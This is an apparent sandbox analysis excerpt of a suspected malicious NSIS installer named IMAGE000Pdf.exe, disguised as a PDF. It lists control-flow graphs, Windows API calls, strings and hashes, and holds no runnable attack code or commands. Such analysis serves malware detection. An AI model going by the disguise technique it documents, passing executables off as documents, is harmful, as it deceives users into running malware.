                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IMAGE000Pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 2803837635-1592252928
                                      • Opcode ID: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                      • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                      • Opcode Fuzzy Hash: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                      • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 670 40642b-406436 671 406438-406447 670->671 672 406449-40645f 670->672 671->672 673 406465-406472 672->673 674 406677-40667d 672->674 673->674 677 406478-40647f 673->677 675 406683-40668e 674->675 676 406484-406491 674->676 678 406690-406694 call 4063ee 675->678 679 406699-40669a 675->679 676->675 680 406497-4064a3 676->680 677->674 678->679 682 406664 680->682 683 4064a9-4064e7 680->683 684 406672-406675 682->684 685 406666-406670 682->685 686 406607-40660b 683->686 687 4064ed-4064f8 683->687 684->674 685->674 690 40660d-406613 686->690 691 40663e-406642 686->691 688 406511 687->688 689 4064fa-4064ff 687->689 695 406518-40651f 688->695 689->688 692 406501-406504 689->692 693 406623-40662f call 4063ee 690->693 694 406615-406621 call 406335 690->694 696 406651-406662 lstrlenW 691->696 697 406644-40664c call 40642b 691->697 692->688 698 406506-406509 692->698 708 406634-40663a 693->708 694->708 700 406521-406523 695->700 701 406524-406526 695->701 696->674 697->696 698->688 704 40650b-40650f 698->704 700->701 706 406561-406564 701->706 707 406528-406546 call 4062bc 701->707 704->695 711 406574-406577 706->711 712 406566-406572 GetSystemDirectoryW 706->712 716 40654b-40654f 707->716 708->696 710 40663c 708->710 717 4065ff-406605 call 40669d 710->717 714 4065e2-4065e4 711->714 715 406579-406587 GetWindowsDirectoryW 711->715 713 4065e6-4065ea 712->713 713->717 722 4065ec 713->722 714->713 719 406589-406593 714->719 715->714 720 406555-40655c call 40642b 716->720 721 4065ef-4065f2 716->721 717->696 724 406595-406598 719->724 725 4065ad-4065c3 SHGetSpecialFolderLocation 719->725 720->713 721->717 727 4065f4-4065fa lstrcatW 721->727 722->721 724->725 728 40659a-4065a1 724->728 729 4065c5-4065dc SHGetPathFromIDListW CoTaskMemFree 725->729 730 4065de 725->730 727->717 732 4065a9-4065ab 728->732 729->713 729->730 730->714 732->713 732->725
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                      • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                      • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                      • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                      • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 717251189-1230650788
                                      • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                      • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                      • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                      • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 733 405456-40546b 734 405471-405482 733->734 735 405522-405526 733->735 736 405484-405488 call 40642b 734->736 737 40548d-405499 lstrlenW 734->737 736->737 739 4054b6-4054ba 737->739 740 40549b-4054ab lstrlenW 737->740 742 4054c9-4054cd 739->742 743 4054bc-4054c3 SetWindowTextW 739->743 740->735 741 4054ad-4054b1 lstrcatW 740->741 741->739 744 405513-405515 742->744 745 4054cf-405511 SendMessageW * 3 742->745 743->742 744->735 746 405517-40551a 744->746 745->744 746->735
                                      APIs
                                      • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,759223A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                      • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,759223A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                      • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,759223A0), ref: 004054B1
                                      • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2531174081-0
                                      • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                      • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                      • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                      • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 747 405925-405970 CreateDirectoryW 748 405972-405974 747->748 749 405976-405983 GetLastError 747->749 750 40599d-40599f 748->750 749->750 751 405985-405999 SetFileSecurityW 749->751 751->748 752 40599b GetLastError 751->752 752->750
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                      • GetLastError.KERNEL32 ref: 0040597C
                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                      • GetLastError.KERNEL32 ref: 0040599B
                                      Strings
                                      • C:\Users\user\Desktop, xrefs: 00405925
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                      • API String ID: 3449924974-1521822154
                                      • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                      • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                      • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                      • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 753 406773-406793 GetSystemDirectoryW 754 406795 753->754 755 406797-406799 753->755 754->755 756 4067aa-4067ac 755->756 757 40679b-4067a4 755->757 759 4067ad-4067e0 wsprintfW LoadLibraryExW 756->759 757->756 758 4067a6-4067a8 757->758 758->759
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                      • wsprintfW.USER32 ref: 004067C5
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%S.dll$UXTHEME$\
                                      • API String ID: 2200240437-1946221925
                                      • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                      • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                      • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                      • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 760 40324c-403263 761 403265 760->761 762 40326c-403275 760->762 761->762 763 403277 762->763 764 40327e-403283 762->764 763->764 765 403293-4032a0 call 403444 764->765 766 403285-40328e call 40345a 764->766 770 403432 765->770 771 4032a6-4032aa 765->771 766->765 772 403434-403435 770->772 773 4032b0-4032d6 GetTickCount 771->773 774 4033dd-4033df 771->774 777 40343d-403441 772->777 778 40343a 773->778 779 4032dc-4032e4 773->779 775 4033e1-4033e4 774->775 776 40341f-403422 774->776 775->778 782 4033e6 775->782 780 403424 776->780 781 403427-403430 call 403444 776->781 778->777 783 4032e6 779->783 784 4032e9-4032f7 call 403444 779->784 780->781 781->770 792 403437 781->792 786 4033e9-4033ef 782->786 783->784 784->770 794 4032fd-403306 784->794 789 4033f1 786->789 790 4033f3-403401 call 403444 786->790 789->790 790->770 798 403403-40340f call 405f96 790->798 792->778 796 40330c-40332c call 40693e 794->796 801 403332-403345 GetTickCount 796->801 802 4033d5-4033d7 796->802 804 403411-40341b 798->804 805 4033d9-4033db 798->805 806 403390-403392 801->806 807 403347-40334f 801->807 802->772 804->786 808 40341d 804->808 805->772 811 403394-403398 806->811 812 4033c9-4033cd 806->812 809 403351-403355 807->809 810 403357-403388 MulDiv wsprintfW call 405456 807->810 808->778 809->806 809->810 817 40338d 810->817 815 40339a-4033a1 call 405f96 811->815 816 4033af-4033ba 811->816 812->779 813 4033d3 812->813 813->778 821 4033a6-4033a8 815->821 819 4033bd-4033c1 816->819 817->806 819->796 820 4033c7 819->820 820->778 821->805 822 4033aa-4033ad 821->822 822->819
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CountTick$wsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 551687249-2449383134
                                      • Opcode ID: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
                                      • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                      • Opcode Fuzzy Hash: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
                                      • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 823 405f13-405f1f 824 405f20-405f54 GetTickCount GetTempFileNameW 823->824 825 405f63-405f65 824->825 826 405f56-405f58 824->826 827 405f5d-405f60 825->827 826->824 828 405f5a 826->828 828->827
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405F31
                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\IMAGE000Pdf.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                      Strings
                                      • nsa, xrefs: 00405F20
                                      • "C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 00405F13
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-4180270439
                                      • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                      • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                      • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                      • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 829 6f931777-6f9317b6 call 6f931b5f 833 6f9318d6-6f9318d8 829->833 834 6f9317bc-6f9317c0 829->834 835 6f9317c2-6f9317c8 call 6f93239e 834->835 836 6f9317c9-6f9317d6 call 6f9323e0 834->836 835->836 841 6f931806-6f93180d 836->841 842 6f9317d8-6f9317dd 836->842 843 6f93180f-6f93182b call 6f9325b5 call 6f9315b4 call 6f931272 GlobalFree 841->843 844 6f93182d-6f931831 841->844 845 6f9317f8-6f9317fb 842->845 846 6f9317df-6f9317e0 842->846 867 6f931885-6f931889 843->867 850 6f931833-6f93187c call 6f9315c6 call 6f9325b5 844->850 851 6f93187e-6f931884 call 6f9325b5 844->851 845->841 852 6f9317fd-6f9317fe call 6f932d83 845->852 848 6f9317e2-6f9317e3 846->848 849 6f9317e8-6f9317e9 call 6f932af8 846->849 856 6f9317f0-6f9317f6 call 6f932770 848->856 857 6f9317e5-6f9317e6 848->857 863 6f9317ee 849->863 850->867 851->867 860 6f931803 852->860 866 6f931805 856->866 857->841 857->849 860->866 863->860 866->841 872 6f9318c6-6f9318cd 867->872 873 6f93188b-6f931899 call 6f932578 867->873 872->833 875 6f9318cf-6f9318d0 GlobalFree 872->875 879 6f9318b1-6f9318b8 873->879 880 6f93189b-6f93189e 873->880 875->833 879->872 882 6f9318ba-6f9318c5 call 6f93153d 879->882 880->879 881 6f9318a0-6f9318a8 880->881 881->879 883 6f9318aa-6f9318ab FreeLibrary 881->883 882->872 883->879
                                      APIs
                                        • Part of subcall function 6F931B5F: GlobalFree.KERNEL32(?), ref: 6F931DD4
                                        • Part of subcall function 6F931B5F: GlobalFree.KERNEL32(?), ref: 6F931DD9
                                        • Part of subcall function 6F931B5F: GlobalFree.KERNEL32(?), ref: 6F931DDE
                                      • GlobalFree.KERNEL32(00000000), ref: 6F931825
                                      • FreeLibrary.KERNEL32(?), ref: 6F9318AB
                                      • GlobalFree.KERNELBASE(00000000), ref: 6F9318D0
                                        • Part of subcall function 6F93239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6F9323CF
                                        • Part of subcall function 6F932770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F9317F6,00000000), ref: 6F932840
                                        • Part of subcall function 6F9315C6: wsprintfW.USER32 ref: 6F9315F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                      • String ID:
                                      • API String ID: 3962662361-3916222277
                                      • Opcode ID: 4226321e8ea1dd678cd803c6b75b959040064961543514c56bd15f3f6f0f6c81
                                      • Instruction ID: 3973c6f3629f9acf9ad916f3e0aae3e69f0f4eaac826f3fe4fe7a3ebe3ae03a8
                                      • Opcode Fuzzy Hash: 4226321e8ea1dd678cd803c6b75b959040064961543514c56bd15f3f6f0f6c81
                                      • Instruction Fuzzy Hash: 1941BF73C04325AADB149F789884BD637ECBF07324F044166E91A9E1E7DB75E1C48BA4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 886 405dcb-405de6 call 4063ee call 405d6e 891 405de8-405dea 886->891 892 405dec-405df9 call 40669d 886->892 894 405e44-405e46 891->894 896 405e09-405e0d 892->896 897 405dfb-405e01 892->897 899 405e23-405e2c lstrlenW 896->899 897->891 898 405e03-405e07 897->898 898->891 898->896 900 405e2e-405e42 call 405cc3 GetFileAttributesW 899->900 901 405e0f-405e16 call 40674c 899->901 900->894 906 405e18-405e1b 901->906 907 405e1d-405e1e call 405d0f 901->907 906->891 906->907 907->899
                                      APIs
                                        • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                        • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                        • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                        • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                      • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                      • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
